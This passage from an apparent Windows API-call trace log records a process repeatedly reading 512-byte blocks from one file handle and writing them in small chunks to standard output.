lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.127] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.127] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) 
returned 1 [0174.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.129] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.129] GetFileType (hFile=0x4c) returned 0x1 [0174.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] GetFileType (hFile=0x4c) returned 0x1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0174.130] GetFileType (hFile=0x4c) returned 0x1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] GetFileType (hFile=0x4c) returned 0x1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] GetFileType (hFile=0x4c) returned 0x1 [0174.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.130] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.130] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] GetFileType (hFile=0x4c) returned 0x1 [0174.153] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.153] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, 
lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.154] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] GetFileType (hFile=0x4c) returned 0x1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.154] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.155] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] GetFileType (hFile=0x4c) returned 0x1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.155] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, 
lpOverlapped=0x0) returned 1 [0174.155] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.156] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.156] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.157] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] GetFileType (hFile=0x4c) returned 0x1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.157] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] GetFileType (hFile=0x4c) returned 0x1 [0174.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.158] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.158] SetFilePointerEx (in: 
